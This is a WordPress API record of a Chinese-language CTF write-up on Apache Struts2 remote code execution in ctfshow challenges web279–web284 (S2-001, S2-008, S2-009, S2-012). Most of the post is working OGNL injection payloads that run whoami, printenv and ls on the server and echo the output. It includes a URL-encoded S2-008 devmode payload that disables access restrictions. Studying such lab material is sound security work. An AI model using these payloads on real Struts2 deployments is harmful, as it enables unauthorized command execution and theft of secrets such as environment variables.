{"id":66,"date":"2025-12-31T10:01:10","date_gmt":"2025-12-31T02:01:10","guid":{"rendered":"https:\/\/blog.miren.baby\/?p=66"},"modified":"2025-12-31T10:01:11","modified_gmt":"2025-12-31T02:01:11","slug":"ctfshow-web%e5%85%a5%e9%97%a8-java","status":"publish","type":"post","link":"https:\/\/blog.miren.baby\/index.php\/2025\/12\/31\/ctfshow-web%e5%85%a5%e9%97%a8-java\/","title":{"rendered":"CTFShow-Web\u5165\u95e8-JAVA"},"content":{"rendered":"\n

web279<\/h2>\n\n\n\n

S2-001 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c<\/p>\n\n\n\n

S2-001 \u662f Apache Struts2 \u6846\u67b6\u4e2d\u7684\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u5229\u7528 OGNL \u8868\u8fbe\u5f0f\u89e3\u6790\u7528\u6237\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u4ece\u800c\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n\n\n\n

S2-001 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c \u6f0f\u6d1e\u590d\u73b0-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n

\u6f0f\u6d1e\u9a8c\u8bc1<\/h3>\n\n\n\n
%{1+1}
%{3+3}<\/pre>\n\n\n\n
\u5c1d\u8bd5\u83b7\u53d6 Tomcat \u6267\u884c\u8def\u5f84\uff1a<\/p>\n\n\n\n
%{\"tomcatBinDir{\"+@java.lang.System@getProperty(\"user.dir\")+\"}\"}<\/pre>\n\n\n\n
\u83b7\u5f97 Tomcat \u6267\u884c\u8def\u5f84\uff1a<\/p>\n\n\n\n
tomcatBinDir{\/usr\/local\/tomcat}<\/pre>\n\n\n\n
\u5c1d\u8bd5\u83b7\u53d6Web\u8def\u5f84\uff1a<\/p>\n\n\n\n
%{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter(), #response.println(#req.getRealPath('\/')), #response.flush(), #response.close() }<\/pre>\n\n\n\n
exp<\/h3>\n\n\n\n
%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{\"whoami\"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }<\/pre>\n\n\n\n
flag\u5728\u73af\u5883\u53d8\u91cf\u4e2d<\/p>\n\n\n\n
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\"printenv\"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}<\/pre>\n\n\n\n
\u5de5\u5177\u68ad\u54c8<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
web282<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
s2-008RCE<\/h3>\n\n\n\n
poc<\/h3>\n\n\n\n
devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()<\/pre>\n\n\n\n
\u5de5\u5177\u68ad\u54c8<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
web283<\/h2>\n\n\n\n
s2-009<\/h3>\n\n\n\n
\u5de5\u5177\u68ad\u54c8<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
web284<\/h2>\n\n\n\n
s2-012<\/h2>\n\n\n\n
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\"whoami\"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}<\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5de5\u5177\u68ad\u54c8<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"
web279 S2-001 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c S2-001 \u662f Apache Struts2 \u6846\u67b6\u4e2d\u7684\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801 […]<\/p>\n","protected":false},"author":2,"featured_media":72,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_import_markdown_pro_load_document_selector":0,"_import_markdown_pro_submit_text_textarea":"","footnotes":""},"categories":[5],"tags":[],"class_list":["post-66","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/posts\/66","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/comments?post=66"}],"version-history":[{"count":1,"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/posts\/66\/revisions"}],"predecessor-version":[{"id":73,"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/posts\/66\/revisions\/73"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/media\/72"}],"wp:attachment":[{"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/media?parent=66"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/categories?post=66"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.miren.baby\/index.php\/wp-json\/wp\/v2\/tags?post=66"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}